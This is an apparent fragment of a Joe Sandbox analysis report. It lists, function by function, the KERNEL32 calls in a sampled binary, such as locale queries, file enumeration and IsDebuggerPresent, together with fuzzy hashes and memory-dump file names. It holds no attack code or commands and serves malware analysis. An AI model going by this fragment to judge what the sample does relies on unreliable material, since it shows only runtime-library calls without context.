                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                • Opcode ID: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
                                                                                                                                                                                                                                                                • Instruction ID: 7a9d823f42a28687bba70c4d099d0ce5dfc8ccaced0def9fc1d1400c876ef318
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95e708f98e352d988744a148c4b39d184aac210fcaafb13d5bf5575842058d65
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3971D1B19051696EDF22AF68CC8DBBABBF8EF05300F1441DAE0499B251DB356F858F10
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0033502C
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 003350F8
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00335111
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0033511B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                                                • Opcode ID: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
                                                                                                                                                                                                                                                                • Instruction ID: 636bb8f79a09921e7fe6b2adf43999b880af472314639bca5086842764a831e9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17daa074bf46731d6ac28134a1bb9ba83d2408f6309d5166b0de5edc03350b11
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54310AB5D053199BDF22DF64DD897CDBBB8AF08300F1041AAE40DAB250EB719B858F45
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00342D53
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00342D9D
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00342E63
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 661929714-0
                                                                                                                                                                                                                                                                • Opcode ID: 3ddee377dbccfdc8df2541a109a689d9fa6cfa5d494d3bf496cb49dd515cc392
                                                                                                                                                                                                                                                                • Instruction ID: 9354c49fd906d152d3c2f268c7dc0283f9f914d56db6ac1265f304ac596fbf86
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ddee377dbccfdc8df2541a109a689d9fa6cfa5d494d3bf496cb49dd515cc392
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D618D71910217DFDB2A9F28CC82BABB7E8EF04301F91416AFD05EA585E774E994CB50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,003331E1), ref: 0033B5B1
                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,003331E1), ref: 0033B5BB
                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(00331542,?,?,?,?,?,003331E1), ref: 0033B5C8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                • Opcode ID: b4605e6f70e4ebe2b39f12964196a6d070cb91f1d50c90a56273934a184c29b0
                                                                                                                                                                                                                                                                • Instruction ID: aa6a68eff32f52e7ded1a1f947b72fc5220388da7f541280c9373e215d96116b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4605e6f70e4ebe2b39f12964196a6d070cb91f1d50c90a56273934a184c29b0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2331937490122D9BCB22DF68D98979DBBB8BF08750F5041DAE41CA6261E7709F858F44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033F807: HeapAlloc.KERNEL32(00000008,?,003331E1,?,0033E921,00000001,00000364,003331E1,00000003,000000FF,?,003360C1,0033186C,0033186A,?,?), ref: 0033F848
                                                                                                                                                                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034384A
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0034393E
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0034397D
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 003439B0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2701053895-0
                                                                                                                                                                                                                                                                • Opcode ID: ca1af8210561e8f1e3cc85d515a39a422457ca48b3ee3b5e99ad6f5fcffda7d1
                                                                                                                                                                                                                                                                • Instruction ID: 2dd02a194d8f4a9cfc8ed964bd6d6bdd0080387fa336c29040894a9ce6ec1f59
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca1af8210561e8f1e3cc85d515a39a422457ca48b3ee3b5e99ad6f5fcffda7d1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB519BB5900119AFDF16AF788CC5EBEBBEDDF85304F254199F4589F241EA30AE418B20
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00343005
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                • Opcode ID: 3eb3ae6ed9320baee1145f4a3e88321dd03ce9badd5d31e42ec3c1d80848eca0
                                                                                                                                                                                                                                                                • Instruction ID: 079598eef13c208ee086a3387bf2bd5b8656ef5fc2bf5d80eaebfbf29a5e3a68
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb3ae6ed9320baee1145f4a3e88321dd03ce9badd5d31e42ec3c1d80848eca0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B218371541206ABDF2A9A19DC82ABB77ECEF44711F100169FD02DB195EB74FE408A51
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00343125
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c3ecdda5b9702afb5bb1cf51e072027251594345588a3c62707e6ab0442f578
                                                                                                                                                                                                                                                                • Instruction ID: 35a6dbb36f53fa5d28d2f2de621f9779f125ed67824d29c143eec9f5fe08b49c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c3ecdda5b9702afb5bb1cf51e072027251594345588a3c62707e6ab0442f578
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4511E572611216ABDB16AB28DC82ABA77ECEF05311F10017AF505DF280EB74FE009790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00342CFF,00000001,00000000,?,-00000050,?,00342AEF,00000000,-00000002,00000000,?,00000055,?), ref: 00342CD6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                • Opcode ID: a7b2fba3c88b9dc00e3a42ddc38cbee634ba161b5f7245874f273261f6e90917
                                                                                                                                                                                                                                                                • Instruction ID: 07896dbc112a87034fb89fe5512e58ab158815eb769493e2b6d6688aa824a014
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7b2fba3c88b9dc00e3a42ddc38cbee634ba161b5f7245874f273261f6e90917
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F11023A2007019FDB19AF39C8D16BABB92FF80358B55442CE9469BA40D371B942CB40
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00342F1B,00000000,00000000,?), ref: 003432AA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                • Opcode ID: d92e841c567f0c186e44a8e455cd491cd5f4870fa9236fd9e4ec8b7d3dee7dff
                                                                                                                                                                                                                                                                • Instruction ID: 6074c448e8aa5620836904891dccd302f74dc57e859fc2193485a1358db33742
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d92e841c567f0c186e44a8e455cd491cd5f4870fa9236fd9e4ec8b7d3dee7dff
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92014932601112BFDB1A5B24CC07BBA3798EB40754F160829EC12AB180EAB1FF41C694
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00342FB1,00000001,?,?,-00000050,?,00342AB7,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00342F9C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                • Opcode ID: 958bec20e0edaf7312e75f222e4d49f1962e913784d80c6be1b27d37aa9d5376
                                                                                                                                                                                                                                                                • Instruction ID: eaf37005f014a16826ff39d29f7260e7e6ea146689a0df40a6345ceea55f66b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 958bec20e0edaf7312e75f222e4d49f1962e913784d80c6be1b27d37aa9d5376
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F0F6362003045FDB165F39D881A7B7BE5EF80768F86842CF9455F690D7B1BC42C650
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033B750: EnterCriticalSection.KERNEL32(-00023A67,?,00338F5A,00000000,003544D8,0000000C,00338F13,?,?,0033F83A,?,?,0033E921,00000001,00000364,003331E1), ref: 0033B75F
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(0033F70A,00000001,00354928,0000000C,0033F118,-00000050), ref: 0033F74F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                • Opcode ID: 9fb30f76d2e90f41c263a504470102795b30cefd37d70c301c754e3cee568117
                                                                                                                                                                                                                                                                • Instruction ID: b33a1b41aec5c80d997f3e3287afa14d9593cf41299a6d1a5daa1dfa18b5be7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9fb30f76d2e90f41c263a504470102795b30cefd37d70c301c754e3cee568117
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6FF0E776A04304DFD702DFA8E882B9D77B4EB48766F10416AF515DB2A0CB7959458F80
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: GetLastError.KERNEL32(00000000,?,00340AB9), ref: 0033E787
                                                                                                                                                                                                                                                                  • Part of subcall function 0033E783: SetLastError.KERNEL32(00000000,?,?,00000028,0033B9D2), ref: 0033E829
                                                                                                                                                                                                                                                                • EnumSystemLocalesW.KERNEL32(003430D1,00000001,?,?,?,00342B11,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 003430BD
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000008.00000002.2547039985.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2546769851.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547120473.000000000034C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547167596.0000000000355000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547222611.0000000000356000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547263887.0000000000358000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547318506.000000000035A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000008.00000002.2547371076.000000000035D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_330000_cd2469328d.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a4625ffe0868079c268eb8d2ec575f20adfcd32afa057862175ab62ba7ff462
                                                                                                                                                                                                                                                                • Instruction ID: 6b69b77c643aa38aef550465c6716389e3fcbecebd43c648141a47deb3c3f79a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a4625ffe0868079c268eb8d2ec575f20adfcd32afa057862175ab62ba7ff462
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82F0E53A70020957CB0AAF39D84576ABFD4EFC1751F074058EA0A8F291C672AA82C790
                                                                                                                                                                                                                                                                APIs
